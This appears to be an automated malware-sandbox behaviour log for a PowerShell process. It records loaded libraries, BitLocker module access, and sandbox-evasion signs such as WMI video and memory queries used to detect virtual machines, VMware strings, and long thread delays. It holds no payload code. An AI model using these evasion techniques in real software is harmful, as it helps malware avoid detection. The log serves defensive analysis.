Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt Windows PC source: powershell.exe, 00000000.00000002.1854010170.0000017173254000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Automation.pdb source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\InprocServer32 source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbhI source: powershell.exe, 00000000.00000002.1854010170.0000017173274000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1854010170.0000017173274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1841331335.0000017170F3A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B6CD2A5 pushad ; iretd	0_2_00007FFD9B6CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7E6C52 pushad ; retf	0_2_00007FFD9B7E6C61
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7F3292 push FFFFFFA2h; iretd	0_2_00007FFD9B7F3294
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7E812B push ebx; ret	0_2_00007FFD9B7E816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7E00AD pushad ; iretd	0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7E4FA5 push edi; ret	0_2_00007FFD9B7E4FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7EDDE5 pushad ; iretd	0_2_00007FFD9B7EDE19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8BCB05 push ebp; retf 0000h	0_2_00007FFD9B8BCB15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8BC904 push es; ret	0_2_00007FFD9B8BC907

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6259			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3600			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1852942293.000001717323F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus`
Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1802473956.0000017100C28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1802473956.0000017100C28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1802473956.0000017100C28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1802473956.0000017100C28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1802473956.000001710115A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.1854010170.0000017173274000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
